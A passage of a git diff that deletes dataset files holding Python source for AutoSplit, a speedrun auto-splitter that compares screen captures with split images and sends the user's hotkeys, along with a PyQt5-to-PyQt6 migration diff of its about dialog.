functions - def startAutoSplitter(self): - # if the auto splitter is already running or the button is disabled, don't emit the signal to start it. - if self.startautosplitterButton.text() == 'Running..' or self.startautosplitterButton.isEnabled() == False: - return - else: - self.startAutoSplitterSignal.emit() - - def startReset(self): - self.resetSignal.emit() - - def startSkipSplit(self): - self.skipSplitSignal.emit() - - def startUndoSplit(self): - self.undoSplitSignal.emit() - - def startPause(self): - self.pauseSignal.emit() - - def autoSplitter(self): - # error checking: - if str(self.splitimagefolderLineEdit.text()) == 'No Folder Selected': - self.guiChangesOnReset() - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.guiChangesOnReset() - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.guiChangesOnReset() - self.regionError() - return - - # get split image filenames - self.split_image_filenames = os.listdir(self.split_image_directory) - - # Make sure that each of the images follows the guidelines for correct format - # according to all of the settings selected by the user. - for image in self.split_image_filenames: - - # Check to make sure the file is actually an image format that can be opened - # according to the mask flag - if split_parser.flags_from_filename(image) & 0x02 == 0x02: - source = cv2.imread(self.split_image_directory + image, cv2.IMREAD_UNCHANGED) - - if source is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - if source.shape[2] != 4: - # Error, this file doesn't have an alpha channel even - # though the flag for masking was added - self.guiChangesOnReset() - self.alphaChannelError(image) - return - - else: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - #error out if there is a {p} flag but no pause hotkey set. - if self.pausehotkeyLineEdit.text() == '' and split_parser.flags_from_filename(image) & 0x08 == 0x08: - self.guiChangesOnReset() - self.pauseHotkeyError() - return - - if self.custompausetimesCheckBox.isChecked() and split_parser.pause_from_filename(image) is None: - # Error, this file doesn't have a pause, but the checkbox was - # selected for unique pause times - self.guiChangesOnReset() - self.customPauseError(image) - return - - if self.customthresholdsCheckBox.isChecked() and split_parser.threshold_from_filename(image) is None: - # Error, this file doesn't have a threshold, but the checkbox - # was selected for unique thresholds - self.guiChangesOnReset() - self.customThresholdError(image) - return - - if self.splitLineEdit.text() == '': - self.guiChangesOnReset() - self.splitHotkeyError() - return - - # find reset image then remove it from the list - self.findResetImage() - - # Check that there's only one reset image - for image in self.split_image_filenames: - - if split_parser.is_reset_image(image): - self.guiChangesOnReset() - self.multipleResetImagesError() - return - - # if there is no custom threshold for the reset image, throw an error. - if self.reset_image is not None and self.reset_image_threshold is None: - self.guiChangesOnReset() - self.noResetImageThresholdError() - return - - # If there is no reset hotkey set but a reset image is present, throw an error. - if self.resetLineEdit.text() == '' and self.reset_image is not None: - self.guiChangesOnReset() - self.resetHotkeyError() - return - - # construct groups of splits if needed - self.split_groups = [] - if self.groupDummySplitsCheckBox.isChecked(): - current_group = [] - self.split_groups.append(current_group) - - for i, image in enumerate(self.split_image_filenames): - current_group.append(i) - - flags = split_parser.flags_from_filename(image) - if flags & 0x01 != 0x01 and i < len(self.split_image_filenames) - 1: - current_group = [] - self.split_groups.append(current_group) - - # construct dummy splits array - self.dummy_splits_array = [] - for i, image in enumerate(self.split_image_filenames): - if split_parser.flags_from_filename(image) & 0x01 == 0x01: - self.dummy_splits_array.append(True) - else: - self.dummy_splits_array.append(False) - - # construct loop amounts for each split image - self.split_image_loop_amount = [] - for i, image in enumerate(self.split_image_filenames): - self.split_image_loop_amount.append(split_parser.loop_from_filename(image)) - - if any(x > 1 for x in self.split_image_loop_amount) and self.groupDummySplitsCheckBox.isChecked() == True: - self.dummySplitsError() - return - - self.guiChangesOnStart() - - # initialize some settings - self.split_image_number = 0 - self.loop_number = 1 - self.number_of_split_images = len(self.split_image_filenames) - self.waiting_for_split_delay = False - self.split_below_threshold = False - - self.run_start_time = time.time() - - # First while loop: stays in this loop until all of the split images have been split - while self.split_image_number < self.number_of_split_images: - - # Check if we are not waiting for the split delay to send the key press - if self.waiting_for_split_delay == True: - time_millis = int(round(time.time() * 1000)) - if time_millis < self.split_time: - QtWidgets.QApplication.processEvents() - continue - - self.updateSplitImage() - - # second while loop: stays in this loop until similarity threshold is met - # skip loop if we just finished waiting for the split delay and need to press the split key! - start = time.time() - while True: - # reset if the set screen region window was closed - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - reset_masked = None - capture = None - - if self.shouldCheckResetImage(): - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # get capture again if needed - masked = (self.flags & 0x02 == 0x02) - if capture is None or masked != reset_masked: - capture = self.getCaptureForComparison(masked) - - # calculate similarity for split image - self.similarity = self.compareImage(self.split_image, self.mask, capture) - - # show live similarity if the checkbox is checked - if self.showlivesimilarityCheckBox.isChecked(): - self.livesimilarityLabel.setText(str(self.similarity)[:4]) - else: - self.livesimilarityLabel.setText(' ') - - # if the similarity becomes higher than highest similarity, set it as such. - if self.similarity > self.highest_similarity: - self.highest_similarity = self.similarity - - # show live highest similarity if the checkbox is checked - if self.showhighestsimilarityCheckBox.isChecked(): - self.highestsimilarityLabel.setText(str(self.highest_similarity)[:4]) - else: - self.highestsimilarityLabel.setText(' ') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - # if the b flag is set, let similarity go above threshold first, then split on similarity below threshold. - # if no b flag, just split when similarity goes above threshold. - if self.flags & 0x04 == 0x04 and self.split_below_threshold == False: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = True - continue - elif self.flags & 0x04 == 0x04 and self.split_below_threshold == True: - if self.waiting_for_split_delay == False and self.similarity < self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = False - break - else: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - break - - # limit the number of time the comparison runs to reduce cpu usage - fps_limit = self.fpslimitSpinBox.value() - time.sleep((1 / fps_limit) - (time.time() - start) % (1 / fps_limit)) - QtWidgets.QApplication.processEvents() - - # comes here when threshold gets met - - # We need to make sure that this isn't a dummy split before sending - # the key press. - if (self.flags & 0x01 == 0x01): - pass - else: - # If it's a delayed split, check if the delay has passed - # Otherwise calculate the split time for the key press - if self.split_delay > 0 and self.waiting_for_split_delay == False: - self.split_time = int(round(time.time() * 1000)) + self.split_delay - self.waiting_for_split_delay = True - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() - while time.time() - delay_start_time < (self.split_delay / 1000): - self.delay_time_left = str(round((self.split_delay / 1000) - (time.time() - delay_start_time), 1)) - self.currentSplitImage.setText('Delayed Split: ' + self.delay_time_left + ' sec remaining') - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - self.waiting_for_split_delay = False - - # if {p} flag hit pause key, otherwise hit split hotkey - if (self.flags & 0x08 == 0x08): - keyboard.send(str(self.pausehotkeyLineEdit.text())) - else: - keyboard.send(str(self.splitLineEdit.text())) - - # increase loop number if needed, set to 1 if it was the last loop. - if self.loop_number < self.split_image_loop_amount[self.split_image_number]: - self.loop_number = self.loop_number + 1 - else: - self.loop_number = 1 - - # if loop check box is checked and its the last split, go to first split. - # else if current loop amount is back to 1, add 1 to split image number - # else pass, dont change split image number. - if self.loopCheckBox.isChecked() and self.split_image_number == self.number_of_split_images - 1 and self.loop_number == 1: - self.split_image_number = 0 - elif self.loop_number == 1: - self.split_image_number = self.split_image_number + 1 - else: - pass - - # set a "pause" split image number. This is done so that it can detect if user hit split/undo split while paused. - pause_split_image_number = self.split_image_number - pause_loop_number = self.loop_number - - # if its not the last split image, pause for the amount set by the user - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - QtWidgets.QApplication.processEvents() - - # I have a pause loop here so that it can check if the user presses skip split, undo split, or reset here. - # Also updates the current split image text, counting down the time until the next split image - pause_start_time = time.time() - while time.time() - pause_start_time < self.pauseDoubleSpinBox.value(): - self.pause_time_left = str(round((self.pauseDoubleSpinBox.value()) - (time.time() - pause_start_time), 1)) - self.currentSplitImage.setText('None (Paused). ' + self.pause_time_left + ' sec remaining') - - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # check for skip/undo split: - if self.split_image_number != pause_split_image_number or self.loop_number != pause_loop_number: - break - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - # loop breaks to here when the last image splits - self.guiChangesOnReset() - - def guiChangesOnStart(self): - self.startautosplitterButton.setText('Running..') - self.browseButton.setEnabled(False) - self.startautosplitterButton.setEnabled(False) - self.resetButton.setEnabled(True) - self.undosplitButton.setEnabled(True) - self.skipsplitButton.setEnabled(True) - self.setsplithotkeyButton.setEnabled(False) - self.setresethotkeyButton.setEnabled(False) - self.setskipsplithotkeyButton.setEnabled(False) - self.setundosplithotkeyButton.setEnabled(False) - self.setpausehotkeyButton.setEnabled(False) - self.custompausetimesCheckBox.setEnabled(False) - self.customthresholdsCheckBox.setEnabled(False) - self.groupDummySplitsCheckBox.setEnabled(False) - QtWidgets.QApplication.processEvents() - - def guiChangesOnReset(self): - self.startautosplitterButton.setText('Start Auto Splitter') - self.imageloopLabel.setText("Image Loop #:") - self.currentSplitImage.setText(' ') - self.currentsplitimagefileLabel.setText(' ') - self.livesimilarityLabel.setText(' ') - self.highestsimilarityLabel.setText(' ') - self.browseButton.setEnabled(True) - self.startautosplitterButton.setEnabled(True) - self.resetButton.setEnabled(False) - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.setsplithotkeyButton.setEnabled(True) - self.setresethotkeyButton.setEnabled(True) - self.setskipsplithotkeyButton.setEnabled(True) - self.setundosplithotkeyButton.setEnabled(True) - self.setpausehotkeyButton.setEnabled(True) - self.custompausetimesCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setEnabled(True) - self.groupDummySplitsCheckBox.setEnabled(True) - QtWidgets.QApplication.processEvents() - - def compareImage(self, image, mask, capture): - if mask is None: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash(image, capture) - else: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash_masked(image, capture, mask) - - def getCaptureForComparison(self, masked): - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - - # if flagged as a mask, capture with nearest neighbor interpolation. else don't so that - # threshold settings on versions below 1.2.0 aren't messed up - if (masked): - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), interpolation=cv2.INTER_NEAREST) - else: - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # convert to BGR - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - return capture - - def shouldCheckResetImage(self): - if self.reset_image is not None and time.time() - self.run_start_time > self.reset_image_pause_time: - return True - - return False - - def findResetImage(self): - self.reset_image = None - self.reset_mask = None - self.reset_image_threshold = None - - reset_image_file = None - for i, image in enumerate(self.split_image_filenames): - if split_parser.is_reset_image(image): - reset_image_file = image - break - - if reset_image_file is None: - return - - self.split_image_filenames.remove(reset_image_file) - - # create reset image and keep in memory - path = self.split_image_directory + reset_image_file - flags = split_parser.flags_from_filename(reset_image_file) - - self.reset_image_threshold = split_parser.threshold_from_filename(reset_image_file) - - self.reset_image_pause_time = split_parser.pause_from_filename(reset_image_file) - if self.reset_image_pause_time is None: - self.reset_image_pause_time = 0 - - # if theres a mask flag, create a mask - if (flags & 0x02 == 0x02): - # create mask based on resized, nearest neighbor interpolated split image - self.reset_image = cv2.imread(path, cv2.IMREAD_UNCHANGED) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.reset_mask = cv2.inRange(self.reset_image, lower, upper) - - # set split image as BGR - self.reset_image = cv2.cvtColor(self.reset_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - self.reset_image = cv2.imread(path, cv2.IMREAD_COLOR) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - def updateSplitImage(self): - - # get split image path - split_image_file = self.split_image_filenames[0 + self.split_image_number] - self.split_image_path = self.split_image_directory + split_image_file - - # get flags - self.flags = split_parser.flags_from_filename(split_image_file) - - # set current split image in UI - # if flagged as mask, transform transparency into UI's gray BG color - if (self.flags & 0x02 == 0x02): - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - transparent_mask = self.split_image_display[:, :, 3] == 0 - self.split_image_display[transparent_mask] = [240, 240, 240, 255] - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGRA2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - # if not flagged as mask, open normally - else: - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGR2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, - QtGui.QImage.Format.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - - # if theres a mask flag, create a mask - if (self.flags & 0x02 == 0x02): - - # create mask based on resized, nearest neighbor interpolated split image - self.split_image = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - self.split_image = cv2.resize(self.split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.mask = cv2.inRange(self.split_image, lower, upper) - - # set split image as BGR - self.split_image = cv2.cvtColor(self.split_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - split_image = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - self.mask = None - - # If the unique parameters are selected, go ahead and set the spinboxes to those values - if self.custompausetimesCheckBox.isChecked(): - self.pauseDoubleSpinBox.setValue(split_parser.pause_from_filename(split_image_file)) - - if self.customthresholdsCheckBox.isChecked(): - self.similaritythresholdDoubleSpinBox.setValue(split_parser.threshold_from_filename(split_image_file)) - - # Get delay for split, if any - self.split_delay = split_parser.delay_from_filename(split_image_file) - - # Set Image Loop # - self.imageloopLabel.setText("Image Loop #: " + str(self.loop_number)) - - # need to set split below threshold to false each time an image updates. - self.split_below_threshold = False - - self.similarity = 0 - self.highest_similarity = 0.001 - - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): - # give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. - msgBox = QtWidgets.QMessageBox - settings_file_name = "Untitled" \ - if self.last_successfully_loaded_settings_file_path is None \ - else os.path.basename(self.last_successfully_loaded_settings_file_path) - warning_message = f"Do you want to save changes made to settings file {settings_file_name}?" - - warning = msgBox.warning( - self, - "AutoSplit", - warning_message, - msgBox.StandardButton.Yes | msgBox.StandardButton.No | msgBox.StandardButton.Cancel) - - if warning == msgBox.StandardButton.Yes: - # TODO: Don't close if user cancelled the save - self.saveSettingsAs() - exit() - if warning == msgBox.StandardButton.No: - exit() - if warning == msgBox.StandardButton.Cancel: - event.ignore() - else: - event.accept() - sys.exit() - - -def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() - sys.exit(app.exec()) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff deleted file mode 100644 index 02ed2b0..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff +++ /dev/null @@ -1,58 +0,0 @@ -diff --git a/src/about.py b/src/about.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/about.py - +++ b/src/about.py -@@ -2,11 +2,11 @@ - - # Form implementation generated from reading ui file 'about.ui' - # --# Created by: PyQt5 UI code generator 4.11.4 -+# Created by: PyQt6 UI code generator 4.11.4 - # - # WARNING! All changes made in this file will be lost! - --from PyQt5 import QtCore, QtGui, QtWidgets -+from PyQt6 import QtCore, QtGui, QtWidgets - - try: - _fromUtf8 = QtCore.QString.fromUtf8 -@@ -16,12 +16,14 @@ except AttributeError: - - try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 -+ - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) - except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -+ - class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) -@@ -29,7 +31,7 @@ class Ui_aboutAutoSplitWidget(object): - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() -- icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) -+ icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) -@@ -45,7 +47,7 @@ class Ui_aboutAutoSplitWidget(object): - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) -- self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignCenter) -+ self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) -@@ -74,5 +76,4 @@ if __name__ == "__main__": - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() -- sys.exit(app.exec_()) -- -+ sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py deleted file mode 100644 index 0898db4..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py +++ /dev/null @@ -1,78 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'about.ui' -# -# Created by: PyQt5 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) - aboutAutoSplitWidget.resize(276, 249) - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) - self.okButton.setObjectName(_fromUtf8("okButton")) - self.createdbyLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.createdbyLabel.setGeometry(QtCore.QRect(10, 44, 151, 16)) - self.createdbyLabel.setObjectName(_fromUtf8("createdbyLabel")) - self.versionLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.versionLabel.setGeometry(QtCore.QRect(10, 21, 71, 16)) - self.versionLabel.setObjectName(_fromUtf8("versionLabel")) - self.donatetextLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatetextLabel.setGeometry(QtCore.QRect(46, 95, 191, 41)) - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) - self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) - self.iconLabel.setObjectName(_fromUtf8("iconLabel")) - - self.retranslateUi(aboutAutoSplitWidget) - self.okButton.clicked.connect(aboutAutoSplitWidget.close) - QtCore.QMetaObject.connectSlotsByName(aboutAutoSplitWidget) - - def retranslateUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setWindowTitle(_translate("aboutAutoSplitWidget", "About AutoSplit", None)) - self.okButton.setText(_translate("aboutAutoSplitWidget", "OK", None)) - self.createdbyLabel.setText(_translate("aboutAutoSplitWidget", "

Created by Toufool and Faschz

", None)) - self.versionLabel.setText(_translate("aboutAutoSplitWidget", "Version: 1.5.0", None)) - self.donatetextLabel.setText(_translate("aboutAutoSplitWidget", "If you enjoy using this program, please\n" -" consider donating. Thank you!", None)) - self.donatebuttonLabel.setText(_translate("aboutAutoSplitWidget", "

", None)) - self.iconLabel.setText(_translate("aboutAutoSplitWidget", "

", None)) - -import resources_rc - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - aboutAutoSplitWidget = QtWidgets.QWidget() - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() - sys.exit(app.exec_()) - diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py deleted file mode 100644 index be083d1..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py +++ /dev/null @@ -1,79 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'about.ui' -# -# Created by: PyQt6 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt6 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - - -class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) - aboutAutoSplitWidget.resize(276, 249) - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) - self.okButton.setObjectName(_fromUtf8("okButton")) - self.createdbyLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.createdbyLabel.setGeometry(QtCore.QRect(10, 44, 151, 16)) - self.createdbyLabel.setObjectName(_fromUtf8("createdbyLabel")) - self.versionLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.versionLabel.setGeometry(QtCore.QRect(10, 21, 71, 16)) - self.versionLabel.setObjectName(_fromUtf8("versionLabel")) - self.donatetextLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatetextLabel.setGeometry(QtCore.QRect(46, 95, 191, 41)) - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) - self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) - self.iconLabel.setObjectName(_fromUtf8("iconLabel")) - - self.retranslateUi(aboutAutoSplitWidget) - self.okButton.clicked.connect(aboutAutoSplitWidget.close) - QtCore.QMetaObject.connectSlotsByName(aboutAutoSplitWidget) - - def retranslateUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setWindowTitle(_translate("aboutAutoSplitWidget", "About AutoSplit", None)) - self.okButton.setText(_translate("aboutAutoSplitWidget", "OK", None)) - self.createdbyLabel.setText(_translate("aboutAutoSplitWidget", "

Created by Toufool and Faschz

", None)) - self.versionLabel.setText(_translate("aboutAutoSplitWidget", "Version: 1.5.0", None)) - self.donatetextLabel.setText(_translate("aboutAutoSplitWidget", "If you enjoy using this program, please\n" -" consider donating. Thank you!", None)) - self.donatebuttonLabel.setText(_translate("aboutAutoSplitWidget", "

